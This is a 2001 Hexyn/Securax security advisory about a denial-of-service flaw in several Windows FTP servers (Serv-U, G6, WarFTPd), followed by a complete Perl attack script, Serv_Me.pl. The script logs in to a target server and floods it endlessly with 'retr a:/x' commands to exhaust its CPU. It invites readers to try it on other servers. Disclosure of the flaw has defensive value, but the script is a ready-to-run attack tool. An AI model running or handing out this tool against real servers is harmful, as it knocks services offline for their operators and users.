Hexyn-sa-19.txt

`Hexyn / Securax Advisory #19 - Multiple FTP Server DoS  
  
Topic: Multiple FTP Server DoS  
Announced: 2001-02-17  
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...  
  
DISCLAIMER:  
***********  
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.  
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.  
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.  
  
THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL   
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS   
BE CORRECT.  
  
I. Problem Description  
**********************  
There is a DoS attack in most of the FTP Servers available on for  
Windows 9x/NT. The bug is a consequence of the way Windows handles disk  
drives.  
  
II. Impact  
**************  
When sending the command "retr a:/blah" (or "get a:/blah" in the  
default UNIX FTP client), the server will freeze for about one second,  
and the CPU usage will go through the roof.  
  
Exploit:  
--------  
Available at: http://t-Omicr0n.hexyn.be/exploits.htm  
  
III. Solution  
*************  
At this time, no patch is available yet.  
  
IV. Credits  
***********  
Bug discovered by t-Omicr0n <[email protected]>  
  
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,   
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,   
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone   
at #[email protected]  
  
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be  
  
  
  
#!/usr/bin/perl  
  
#  
# Serv_Me.pl - Remote FTP DoS'er  
# ------------------------------  
# "And in the end I will be free, by kissing you, or killing me."  
# -- Mister Me.  
  
# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.  
# It DoSSeS by flooding the server with "retr a:/bla" commands.  
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...  
  
# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information  
# @ http://t-Omicr0n.hexyn.be/advisories.htm  
  
# I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell   
# out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,  
# that's considered a drop of bytes every second.  
# You can even DoS the server over a 1 KiloBit/s modem... :-)  
  
# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F,   
# Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips,   
# Lacrima, GigaByte and everyone at #[email protected]   
  
# WARNING: This *may* damage the server's floppy disk drive.  
  
use IO::Socket;   
  
sub initiate {  
if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}  
  
$host = $ARGV[0];  
$port = $ARGV[1];  
$user = $ARGV[2];  
$pass = $ARGV[3];  
};  
  
sub connecttoserver {  
print("Connecting to host: $host\n");  
$socket = IO::Socket::INET->new ( PeerAddr => $host,  
PeerPort => $port,  
Proto => "tcp",  
Type => SOCK_STREAM  
) || die "Can't connect to $host";   
  
print "Socket Connected. Loggin in...\n";  
};  
  
sub login {  
print "user $user\n";  
print $socket "user $user\r\n";  
$response = <$socket>;  
print "$response\n";  
  
print "pass $pass\n";  
print $socket "pass $pass\r\n";  
$response = <$socket>;  
print "$response\n";  
  
print "Logged in. Dossing now. Press CTRL-C to stop.\n";  
};  
  
  
  
sub doit {  
for (;;){  
print "retr a:/x\n";  
print $socket "retr a:/x\r\n";  
$response = <$socket>;  
print "$response";  
}  
}  
  
initiate();  
connecttoserver();  
login();  
doit();  
  
# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be  
`